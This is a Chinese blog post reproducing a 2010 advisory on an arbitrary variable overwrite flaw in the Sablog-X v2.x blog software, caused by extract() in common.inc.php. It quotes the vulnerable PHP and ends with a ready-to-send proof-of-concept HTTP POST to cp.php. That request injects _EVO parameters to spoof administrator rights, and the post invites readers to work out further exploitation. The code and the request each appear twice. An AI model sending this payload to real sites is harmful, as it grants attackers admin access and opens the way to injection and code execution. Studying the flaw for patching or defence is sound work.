Sablog-X v2.x 任意变量覆盖漏洞

2010年02月21日 | category

作者：80vul-B

一描叙：

由于Sablog-x v2.x的common.inc.php里$_EVO初始化处理存在逻辑漏洞，导致可以利用extract()来覆盖任意变量，最终导致xss、sql注射、代码执行等很多严重的安全漏洞。

二分析

common.inc.php代码里：


....
$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {
@extract($_COOKIE, EXTR_SKIP);
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
...
$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);
list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');
$sax_hash = sax_addslashes($_COOKIE['sax_hash']);
...
$seccode = $sessionexists = 0;
if ($sax_hash) {
...
if ($_EVO = $DB-&gt;fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。
...
}
if(!$sessionexists) {
if($sax_uid) {
if(!($_EVO = $DB-&gt;fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {
...
@extract($_EVO); //覆盖任意变量

....

$onoff = function_exists('ini_get') ? ini_get('register_globals') : get_cfg_var('register_globals');

if ($onoff != 1) {

@extract($_COOKIE, EXTR_SKIP);

@extract($_POST, EXTR_SKIP);

@extract($_GET, EXTR_SKIP);

}

...

$sax_auth_key = md5($onlineip.$_SERVER['HTTP_USER_AGENT']);

list($sax_uid, $sax_pw, $sax_logincount) = $_COOKIE['sax_auth'] ? explode("\t", authcode($_COOKIE['sax_auth'], 'DECODE')) : array('', '', '');

$sax_hash = sax_addslashes($_COOKIE['sax_hash']);

...

$seccode = $sessionexists = 0;

if ($sax_hash) {

...

if ($_EVO = $DB->fetch_array($query)){ //$_EVO初始化过程在if ($sax_hash)里，如果这个if条件不满足，将跳过这个初始化过程。

...

}

if(!$sessionexists) {

if($sax_uid) {

if(!($_EVO = $DB->fetch_one_array("SELECT $userfields FROM {$db_prefix}users u WHERE u.userid='$sax_uid' AND u.password='$sax_pw' AND u.lastip='$onlineip'"))) {

...

@extract($_EVO); //覆盖任意变量

由上面的代码片断可以看到,只要使$sax_hash和$sax_uid的布尔值为fales,$_EVO就不会被赋值,而$sax_hash和$sax_uid这两个变量来自由$_COOKIE,这样我们可以很容易的控制$_EVO了,然后通过extract()来覆盖任意变量,这将导致xss、sql inj、代码执行等很多严重的安全漏洞:)

三利用

下面给个后台权限欺骗的PoC:


POST http://127.0.0.1/sax/cp.php  HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Referer: http://127.0.0.1/sax/cp.php
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)
Host: 127.0.0.1
Content-Length: 138
Connection: Close

_EVO[sax_uid]=1&amp;_EVO[sax_pw]=1&amp;_EVO[sax_logincount]=1&amp;_EVO[sax_hash]=1&amp;_EVO[sax_group]=1&amp;_EVO[sax_auth_key]=1&amp;_EVO[timestamp]=111111111111

POST http://127.0.0.1/sax/cp.php HTTP/1.1

Accept: */*

Accept-Language: zh-cn

Referer: http://127.0.0.1/sax/cp.php

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)

Host: 127.0.0.1

Content-Length: 138

Connection: Close

_EVO[sax_uid]=1&_EVO[sax_pw]=1&_EVO[sax_logincount]=1&_EVO[sax_hash]=1&_EVO[sax_group]=1&_EVO[sax_auth_key]=1&_EVO[timestamp]=111111111111

至于怎么利用各位看观自己研究吧！

1	至于怎么利用各位看观自己研究吧！

所属分类: 学习笔记,工具收集
Tags: sablog, 漏洞

« 无码套图

360安全卫士本地提权漏洞的webshell利用程序 »

没有评论

暂无评论

RSS feed for comments on this post.

对不起，该文章的评论被关闭了！

Sablog-X v2.x 任意变量覆盖漏洞

没有评论

文章分类

热门标签

随机文章

文章归档

Users